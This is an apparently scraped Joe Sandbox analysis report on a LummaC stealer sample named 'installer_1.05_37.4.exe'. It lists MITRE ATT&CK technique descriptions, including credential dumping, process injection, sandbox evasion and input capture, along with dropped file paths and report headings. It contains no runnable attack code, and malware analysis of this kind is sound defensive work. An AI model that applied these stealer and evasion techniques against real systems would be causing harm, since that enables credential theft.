MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E6C27C

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 5e5c6102924e1a32fda308955baa60e8771c9d792e2c1a43fddafaa3867e7243
Instruction ID: 0df02e9556dd2ada780078829439556c5676dd9926b8ed76f1262f91e8cba0fa
Opcode Fuzzy Hash: 5e5c6102924e1a32fda308955baa60e8771c9d792e2c1a43fddafaa3867e7243
Instruction Fuzzy Hash: CC410530680A05AFCB218FE5E854ABA7BE5EF11798F346169FC95B71B1DB319C01CB60

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report installer_1.05_37.4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\224553\Luther.com

C:\Users\user\AppData\Local\Temp\224553\z

C:\Users\user\AppData\Local\Temp\Architect

C:\Users\user\AppData\Local\Temp\Cho

C:\Users\user\AppData\Local\Temp\Choosing

C:\Users\user\AppData\Local\Temp\Crowd

C:\Users\user\AppData\Local\Temp\Departure

C:\Users\user\AppData\Local\Temp\Dot

C:\Users\user\AppData\Local\Temp\Holocaust

C:\Users\user\AppData\Local\Temp\Leone

C:\Users\user\AppData\Local\Temp\Many

C:\Users\user\AppData\Local\Temp\Margin

C:\Users\user\AppData\Local\Temp\Mutual

Windows Analysis Report
installer_1.05_37.4.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre